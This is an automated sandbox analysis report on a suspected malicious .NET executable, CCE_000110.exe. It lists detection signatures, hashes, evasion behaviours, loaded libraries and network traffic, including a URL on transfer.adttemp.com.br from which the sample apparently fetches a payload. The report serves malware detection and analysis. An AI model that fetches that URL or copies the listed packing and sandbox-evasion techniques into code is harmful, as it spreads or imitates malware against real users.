Edit tour

Windows Analysis Report
CCE_000110.exe

Overview

General Information

Sample name:	CCE_000110.exe
Analysis ID:	1518087
MD5:	7f1f15a85427da202d74198b1cd039d9
SHA1:	ca883d37cb9e51c1b2cbeb8ab7a398f4f95df187
SHA256:	44fa04f2cb49eb5ee3d7c3d3dfafa2a53137f6e1dc8edf4b6c21d6c7af487e06
Tags:	exeuser-lowmal3
Infos:

Detection

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Icon mismatch, binary includes an icon from a different legit application in order to fool users

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

Machine Learning detection for sample

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Detected potential crypto function

Enables debug privileges

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Classification

Process Tree

System is w10x64

CCE_000110.exe (PID: 6812 cmdline: "C:\Users\user\Desktop\CCE_000110.exe" MD5: 7F1F15A85427DA202D74198B1CD039D9)

WerFault.exe (PID: 8 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6812 -s 2348 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: CCE_000110.exe

Avira: detected

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.3% probability

Machine Learning detection for sample

Source: CCE_000110.exe

Joe Sandbox ML: detected

Source: CCE_000110.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.168.117.173:443 -> 192.168.2.4:49741 version: TLS 1.2

Source: CCE_000110.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdba source: CCE_000110.exe, 00000000.00000002.1845683540.0000000001440000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WER67F2.tmp.dmp.3.dr
Source:	Binary string: System.ni.pdbRSDS source: WER67F2.tmp.dmp.3.dr
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: CCE_000110.exe, 00000000.00000002.1846656814.0000000003351000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: DF133.pdb. source: CCE_000110.exe, 00000000.00000002.1848478953.00000000068E0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb8 source: WER67F2.tmp.dmp.3.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER67F2.tmp.dmp.3.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER67F2.tmp.dmp.3.dr
Source:	Binary string: System.Configuration.pdb source: WER67F2.tmp.dmp.3.dr
Source:	Binary string: System.Xml.pdb source: WER67F2.tmp.dmp.3.dr
Source:	Binary string: System.pdb source: CCE_000110.exe, 00000000.00000002.1846656814.0000000003351000.00000004.00000800.00020000.00000000.sdmp, WER67F2.tmp.dmp.3.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER67F2.tmp.dmp.3.dr
Source:	Binary string: System.Core.ni.pdb source: WER67F2.tmp.dmp.3.dr
Source:	Binary string: \??\C:\Windows\symbols\exe\CVNXGJKDF133.pdb source: CCE_000110.exe, 00000000.00000002.1848478953.00000000068E0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CVNXGJKDF133.pdb source: CCE_000110.exe, WER67F2.tmp.dmp.3.dr
Source:	Binary string: mscorlib.pdb source: CCE_000110.exe, 00000000.00000002.1846656814.0000000003351000.00000004.00000800.00020000.00000000.sdmp, WER67F2.tmp.dmp.3.dr
Source:	Binary string: \??\C:\Users\user\Desktop\CVNXGJKDF133.pdb source: CCE_000110.exe, 00000000.00000002.1848478953.00000000068E0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdbSystem.Core.dll source: WER67F2.tmp.dmp.3.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: CCE_000110.exe, 00000000.00000002.1845683540.0000000001440000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER67F2.tmp.dmp.3.dr
Source:	Binary string: n8C:\Windows\CVNXGJKDF133.pdb source: CCE_000110.exe, 00000000.00000002.1845609529.0000000000FF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER67F2.tmp.dmp.3.dr
Source:	Binary string: CVNXGJKDF133.pdbH source: WER67F2.tmp.dmp.3.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER67F2.tmp.dmp.3.dr
Source:	Binary string: System.ni.pdb source: WER67F2.tmp.dmp.3.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER67F2.tmp.dmp.3.dr

Source: global traffic

HTTP traffic detected: GET /13Lxz9/kingggggme.txt HTTP/1.1Host: transfer.adttemp.com.brConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 52.168.117.173 52.168.117.173

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown	TCP traffic detected without corresponding DNS query: 52.168.117.173
Source: unknown	TCP traffic detected without corresponding DNS query: 52.168.117.173
Source: unknown	TCP traffic detected without corresponding DNS query: 52.168.117.173
Source: unknown	TCP traffic detected without corresponding DNS query: 52.168.117.173
Source: unknown	TCP traffic detected without corresponding DNS query: 52.168.117.173
Source: unknown	TCP traffic detected without corresponding DNS query: 52.168.117.173
Source: unknown	TCP traffic detected without corresponding DNS query: 52.168.117.173
Source: unknown	TCP traffic detected without corresponding DNS query: 52.168.117.173
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /13Lxz9/kingggggme.txt HTTP/1.1Host: transfer.adttemp.com.brConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: transfer.adttemp.com.br

Source: unknown

HTTP traffic detected: POST /Telemetry.Request HTTP/1.1Connection: Keep-AliveUser-Agent: MSDWMSA_DeviceTicket_Error: 0x80004004Content-Length: 4761Host: umwatson.events.data.microsoft.com

Source: CCE_000110.exe, 00000000.00000002.1845683540.00000000013A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.mic
Source: CCE_000110.exe, 00000000.00000002.1846656814.0000000003237000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: CCE_000110.exe, 00000000.00000002.1846656814.0000000003253000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://transfer.adttemp.com.br
Source: CCE_000110.exe, 00000000.00000002.1846656814.0000000003253000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://transfer.adttemp.com.brd
Source: Amcache.hve.3.dr	String found in binary or memory: http://upx.sf.net
Source: CCE_000110.exe, 00000000.00000002.1846656814.0000000003237000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://transfer.adttemp.com.br
Source: CCE_000110.exe, 00000000.00000002.1846656814.0000000003237000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://transfer.adttemp.com.br/13Lxz9/kingggggme.txt

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443

Source: unknown	HTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.168.117.173:443 -> 192.168.2.4:49741 version: TLS 1.2

Source: C:\Users\user\Desktop\CCE_000110.exe	Code function: 0_2_02F66A87	0_2_02F66A87
Source: C:\Users\user\Desktop\CCE_000110.exe	Code function: 0_2_02F61260	0_2_02F61260
Source: C:\Users\user\Desktop\CCE_000110.exe	Code function: 0_2_02F61252	0_2_02F61252
Source: C:\Users\user\Desktop\CCE_000110.exe	Code function: 0_2_02F61884	0_2_02F61884
Source: C:\Users\user\Desktop\CCE_000110.exe	Code function: 0_2_02F615B0	0_2_02F615B0
Source: C:\Users\user\Desktop\CCE_000110.exe	Code function: 0_2_02F615A0	0_2_02F615A0

Source: C:\Users\user\Desktop\CCE_000110.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6812 -s 2348

Source: CCE_000110.exe, 00000000.00000000.1698407301.0000000000E64000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameCVNXGJKDF133.exe: vs CCE_000110.exe
Source: CCE_000110.exe, 00000000.00000002.1845683540.000000000136E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs CCE_000110.exe
Source: CCE_000110.exe	Binary or memory string: OriginalFilenameCVNXGJKDF133.exe: vs CCE_000110.exe

Source: CCE_000110.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: CCE_000110.exe, v9jlU93sWFkGpdFyBn.cs	Cryptographic APIs: 'CreateDecryptor'
Source: CCE_000110.exe, DmmcwivajFKiAmcJId.cs	Cryptographic APIs: 'CreateDecryptor'
Source: CCE_000110.exe, DmmcwivajFKiAmcJId.cs	Cryptographic APIs: 'CreateDecryptor'
Source: CCE_000110.exe, DmmcwivajFKiAmcJId.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal68.evad.winEXE@2/5@1/2

Source: C:\Users\user\Desktop\CCE_000110.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6812

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\599a4cf9-4d96-40a1-8516-8fd5640ecb8f

Jump to behavior

Source: CCE_000110.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: CCE_000110.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\CCE_000110.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\CCE_000110.exe

File read: C:\Users\user\Desktop\CCE_000110.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\CCE_000110.exe "C:\Users\user\Desktop\CCE_000110.exe"
Source: C:\Users\user\Desktop\CCE_000110.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6812 -s 2348

Source: C:\Users\user\Desktop\CCE_000110.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\CCE_000110.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\CCE_000110.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: CCE_000110.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: CCE_000110.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: CCE_000110.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdba source: CCE_000110.exe, 00000000.00000002.1845683540.0000000001440000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WER67F2.tmp.dmp.3.dr
Source:	Binary string: System.ni.pdbRSDS source: WER67F2.tmp.dmp.3.dr
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: CCE_000110.exe, 00000000.00000002.1846656814.0000000003351000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: DF133.pdb. source: CCE_000110.exe, 00000000.00000002.1848478953.00000000068E0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb8 source: WER67F2.tmp.dmp.3.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER67F2.tmp.dmp.3.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER67F2.tmp.dmp.3.dr
Source:	Binary string: System.Configuration.pdb source: WER67F2.tmp.dmp.3.dr
Source:	Binary string: System.Xml.pdb source: WER67F2.tmp.dmp.3.dr
Source:	Binary string: System.pdb source: CCE_000110.exe, 00000000.00000002.1846656814.0000000003351000.00000004.00000800.00020000.00000000.sdmp, WER67F2.tmp.dmp.3.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER67F2.tmp.dmp.3.dr
Source:	Binary string: System.Core.ni.pdb source: WER67F2.tmp.dmp.3.dr
Source:	Binary string: \??\C:\Windows\symbols\exe\CVNXGJKDF133.pdb source: CCE_000110.exe, 00000000.00000002.1848478953.00000000068E0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CVNXGJKDF133.pdb source: CCE_000110.exe, WER67F2.tmp.dmp.3.dr
Source:	Binary string: mscorlib.pdb source: CCE_000110.exe, 00000000.00000002.1846656814.0000000003351000.00000004.00000800.00020000.00000000.sdmp, WER67F2.tmp.dmp.3.dr
Source:	Binary string: \??\C:\Users\user\Desktop\CVNXGJKDF133.pdb source: CCE_000110.exe, 00000000.00000002.1848478953.00000000068E0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdbSystem.Core.dll source: WER67F2.tmp.dmp.3.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: CCE_000110.exe, 00000000.00000002.1845683540.0000000001440000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER67F2.tmp.dmp.3.dr
Source:	Binary string: n8C:\Windows\CVNXGJKDF133.pdb source: CCE_000110.exe, 00000000.00000002.1845609529.0000000000FF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER67F2.tmp.dmp.3.dr
Source:	Binary string: CVNXGJKDF133.pdbH source: WER67F2.tmp.dmp.3.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER67F2.tmp.dmp.3.dr
Source:	Binary string: System.ni.pdb source: WER67F2.tmp.dmp.3.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER67F2.tmp.dmp.3.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: CCE_000110.exe, DmmcwivajFKiAmcJId.cs

.Net Code: Type.GetTypeFromHandle(qqVlA2RylYZokfVnQY.B6JbfP0wE9S1M(16777254)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(qqVlA2RylYZokfVnQY.B6JbfP0wE9S1M(16777255)),Type.GetTypeFromHandle(qqVlA2RylYZokfVnQY.B6JbfP0wE9S1M(16777252))})

Source: CCE_000110.exe

Static PE information: 0xDDCD7764 [Tue Dec 2 19:03:00 2087 UTC]

Source: CCE_000110.exe, LMQrQtSxUYwvGMOqEv.cs	High entropy of concatenated method names: 'WK1bFUkp2v', 'XNfbAFO9tp', 'Tv0b614mec', 'buibONRqJ9', 'timbhsHsUw', 'tULbzOa2el', 'IyVn4a21pi', 'tsmnbUbSNo', 'JDKnnGvXoi', 'FTWnP3Xasa'
Source: CCE_000110.exe, DmmcwivajFKiAmcJId.cs	High entropy of concatenated method names: 'pl7bE5ZZFG', 'jYAbfP80GQcdC', 'fgerYhlsW', 'hDaDIb3xZ', 'rUrJeLRFj', 's1icIrgt9', 'Ws8kW8O99', 'VxM90ucl8', 'fvui2X8UZ', 'ORoWuAZpA'

Hooking and other Techniques for Hiding and Protection

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: download (92).png

Source: C:\Users\user\Desktop\CCE_000110.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CCE_000110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
